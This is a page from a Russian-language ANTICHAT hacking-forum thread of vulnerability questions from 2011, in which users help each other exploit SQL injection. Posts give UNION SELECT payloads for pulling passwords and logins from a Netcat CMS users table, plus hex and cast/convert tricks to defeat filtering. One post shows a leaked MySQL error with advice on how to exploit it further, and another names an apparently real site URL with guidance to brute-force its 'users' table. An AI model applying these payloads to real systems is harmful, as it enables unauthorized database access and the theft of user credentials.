HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1590 из 2422 « Первая < 5901090149015401580 1586 1587 1588 1589 1590 1591 1592 1593 1594 1600164016902090 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.01.2011, 08:21
xarko_v
Новичок
Регистрация: 18.01.2011
Сообщений: 10
С нами: 8060726

Репутация: 0
По умолчанию
http://www.exploit-db.com/exploits/15827/
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 25.01.2011, 13:31
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
Netcat CMS

-1+union+select+1,user_id+from+User+--+ показывает

-1+union+select+1,unhex(hex(password))+from+User+--+ показывает

-1+union+select+1,password+from+User+--+ показывает

-1+union+select+1,login+from+User+--+ НЕ показывает

-1+union+select+1,unhex(hex(login))+from+User+--+ НЕ показывает

-1+union+select+1,aes_decrypt(aes_encrypt(login))+f rom+User+--+ НЕ показывает

Ни Email, Login, ForumName, FullName не хочет показывать как можно это обойти?
 
Ответить с цитированием

  #3  
Старый 25.01.2011, 13:37
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию
2noviyuser

пробуй захексить

login=0x6c6f67696e
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #4  
Старый 25.01.2011, 13:39
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
Цитата:
Сообщение от shell_c0de  
2noviyuser
пробуй захексить
login=0x6c6f67696e
не хочет показывает только login, не подошел

можент надо конвертировать str в int? есть ли такая функция
 
Ответить с цитированием

  #5  
Старый 26.01.2011, 04:01
ivitalii
Новичок
Регистрация: 16.01.2011
Сообщений: 9
С нами: 8063606

Репутация: 0
По умолчанию
Код:
On /index.php?name=1%00%27&file=faq&p=3098
While executing query "SELECT mid, title, custom_title, active, view, blocks, version FROM cms_modules WHERE LOWER(title)='1�''"

the following error occured: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1' at line 1

In: /home/anonimka/public_html/index.php on line: 73
Что за ошибка ? можно как-нибудь раскрутить ?
 
Ответить с цитированием

  #6  
Старый 26.01.2011, 05:56
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию
Цитата:
Сообщение от ivitalii  
Код:
On /index.php?name=1%00%27&file=faq&p=3098
While executing query "SELECT mid, title, custom_title, active, view, blocks, version FROM cms_modules WHERE LOWER(title)='1�''"

the following error occured: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1' at line 1

In: /home/anonimka/public_html/index.php on line: 73
Что за ошибка ? можно как-нибудь раскрутить ?
Ошибка синтаксиса MySQL. По всей видимости, можно.

Как раскрутить, написано здесь /thread43966.html

П.С. Зачем там нуллбайт?
 
Ответить с цитированием

  #7  
Старый 26.01.2011, 07:28
xarko_v
Новичок
Регистрация: 18.01.2011
Сообщений: 10
С нами: 8060726

Репутация: 0
По умолчанию
Цитата:
Сообщение от noviyuser  
Netcat CMS
-1+union+select+1,user_id+from+User+--+ показывает
-1+union+select+1,unhex(hex(password))+from+User+--+ показывает
-1+union+select+1,password+from+User+--+ показывает
-1+union+select+1,login+from+User+--+ НЕ показывает
-1+union+select+1,unhex(hex(login))+from+User+--+ НЕ показывает
-1+union+select+1,aes_decrypt(aes_encrypt(login))+f rom+User+--+ НЕ показывает
Ни Email, Login, ForumName, FullName не хочет показывать как можно это обойти?
+union+select+1,cast(version()+as+binary),3,4,5,6

or

+union+select+1,convert(version()+using+latin1),3, 4,5,6

or

/*!...*/
 
Ответить с цитированием

  #8  
Старый 27.01.2011, 14:20
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию
помогите разобратся, невогу вывести информацию из табле схема, постоянно пишет ошибку

http://nicedave.com/content.php?id=6659+union+select+1,2,3
 
Ответить с цитированием

  #9  
Старый 27.01.2011, 14:29
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
С нами: 9382468

Репутация: 104
По умолчанию
Цитата:
Сообщение от qaz  
помогите разобратся, невогу вывести информацию из табле схема, постоянно пишет ошибку
http://nicedave.com/content.php?id=6659+union+select+1,2,3
Доступ к information_schema закрыт.Ручками перебирай таблицы.Там есть таблица "users"
 
Ответить с цитированием

  #10  
Старый 27.01.2011, 18:09
j-prof
Постоянный
Регистрация: 29.08.2010
Сообщений: 321
С нами: 8265206

Репутация: -4
По умолчанию
privateurl.com

в поле логин

хз как там раскрутить помогите и вообще кривая какаят +--+ не робит а /* робит чо эт знач помогите

кста через union можно ток select выполнять или апдэйт, delete, insert тож
 
Ответить с цитированием
Ответ
Страница 1590 из 2422 « Первая < 5901090149015401580 1586 1587 1588 1589 1590 1591 1592 1593 1594 1600164016902090 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.